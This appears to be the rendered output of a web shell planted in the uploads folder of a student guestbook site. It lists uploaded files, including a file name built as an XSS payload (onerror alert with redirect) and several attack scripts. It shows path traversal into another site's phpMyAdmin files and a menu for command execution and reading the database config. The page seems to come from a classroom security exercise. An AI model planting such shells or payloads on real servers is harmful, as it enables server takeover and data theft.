🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../589181.klas4s23.mid-ica.nl/public_html/phpmyadmin/libraries/language_stats.inc.php

<?php
/**
 * Automatically generated file, do not edit!
 * Generated by scripts/remove-incomplete-mo
 */

$GLOBALS['language_stats'] = [
    'af' => 8,
    'am' => 0,
    'ar' => 48,
    'ar_LY' => 0,
    'az' => 45,
    'be' => 57,
    'be@latin' => 19,
    'ber' => 0,
    'bg' => 63,
    'bn' => 64,
    'br' => 15,
    'brx' => 0,
    'bs' => 9,
    'ca' => 91,
    'ckb' => 35,
    'cs' => 99,
    'cy' => 14,
    'da' => 89,
    'de' => 99,
    'el' => 90,
    'en_GB' => 96,
    'enm' => 0,
    'eo' => 12,
    'es' => 99,
    'et' => 99,
    'eu' => 13,
    'fa' => 23,
    'fi' => 60,
    'fil' => 14,
    'fr' => 100,
    'fy' => 16,
    'gl' => 71,
    'gu' => 0,
    'he' => 45,
    'hi' => 33,
    'hr' => 26,
    'hu' => 87,
    'hy' => 56,
    'ia' => 75,
    'id' => 76,
    'ig' => 2,
    'it' => 99,
    'ja' => 100,
    'ka' => 21,
    'kab' => 2,
    'kk' => 92,
    'km' => 5,
    'kn' => 3,
    'ko' => 75,
    'ksh' => 0,
    'ku' => 0,
    'ky' => 1,
    'li' => 1,
    'lt' => 38,
    'lv' => 17,
    'mk' => 26,
    'ml' => 1,
    'mn' => 19,
    'ms' => 9,
    'my' => 0,
    'nb' => 59,
    'ne' => 1,
    'nl' => 100,
    'nn' => 0,
    'pa' => 4,
    'pl' => 44,
    'pt' => 97,
    'pt_BR' => 100,
    'rcf' => 2,
    'ro' => 91,
    'ru' => 97,
    'si' => 51,
    'sk' => 72,
    'sl' => 99,
    'sq' => 88,
    'sr' => 18,
    'sr@latin' => 39,
    'sv' => 83,
    'ta' => 31,
    'te' => 7,
    'th' => 39,
    'tk' => 0,
    'tr' => 100,
    'tt' => 12,
    'tzm' => 0,
    'ug' => 9,
    'uk' => 99,
    'ur' => 15,
    'uz' => 26,
    'uz@latin' => 26,
    'vi' => 76,
    'vls' => 2,
    'zh_CN' => 99,
    'zh_TW' => 95,
];

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!